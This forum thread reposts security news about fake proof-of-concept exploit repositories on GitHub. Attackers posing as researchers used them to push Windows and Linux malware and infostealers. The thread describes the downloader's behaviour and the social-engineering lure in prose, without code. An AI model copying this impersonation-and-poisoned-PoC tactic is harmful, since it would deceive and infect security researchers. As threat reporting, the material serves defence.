Fake zero-day PoC exploits on GitHub push Windows, Linux malware


Level 78
Thread author
Honorary Member
Top Poster
Content Creator
Apr 24, 2016
Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware.

These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research.

The repositories appear legitimate, and the users who maintain them impersonate real security researchers from Rapid7, and other security firms, even using their headshots.

The same personas maintain accounts on Twitter to help add legitimacy to their research and the code repositories like GitHub, as well as draw victims from the social media platform.

This campaign was discovered by VulnCheck, who reports that it has been underway since at least May 2023, promoting supposed exploits for zero-day flaws in popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange.

In all cases, the malicious repositories host a Python script ('poc.py') that acts as a malware downloader for Linux and Windows systems.

The script downloads a ZIP archive from an external URL to the victim's computer depending on their operating system, with Linux users downloading 'cveslinux.zip' and Windows users receiving 'cveswindows.zip.'

The malware is saved to the Windows %Temp% or the Linux /home/<username>/.local/share folders, extracted, and executed.

VulnCheck reports that the Windows binary contained in the ZIP ('cves_windows.exe') is flagged by over 60% of AV engines on VirusTotal. The Linux binary ('cves_linux') is much more stealthy, only caught by three scanners.


Staff Member
Malware Hunter
Jul 27, 2015
A GitHub user managed to dupe security researchers by publishing fake proofs-of-concept (PoCs) containing Linux backdoors.

Cybersecurity researchers use PoCs to test and better understand publicly known vulnerabilities. They are essential and ubiquitous which, perhaps, makes it easier for a bad one to slip through. Researchers from Uptycs this week outed a GitHub user (now deactivated) who copied legitimate PoCs for known vulnerabilities, reposting them with hidden Linux-built infostealing malware. One of the two fake PoCs had already been forked 25 times at the time of discovery; a second copy has been forked 20 times.
Neoteric as PoC poisoning may be, hackers have been known to impersonate researchers before. They might do it just to prove that they can, or to learn more about their adversaries. Or, Malladi posits, they might want to steal researchers' powerful software tools.

Meanwhile, there's not much that repositories can do to prevent this particular brand of phishing, even when a fake PoC obviously overlaps with a legitimate one. Malladi posits a hypothetical college course, where beginner students are assigned to code a "hello, world" program in Python, then publish it to GitHub. The same code could be published by dozens of new accounts, "but what can they do? It is a legit thing. That's the problem — even if copying can be detected, the admins cannot do anything about it." And so, cybersecurity professionals are going to have to walk the walk — engaging with cyberspace with the same caution and preparedness they expect of their clients, by always testing in a virtual environment.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.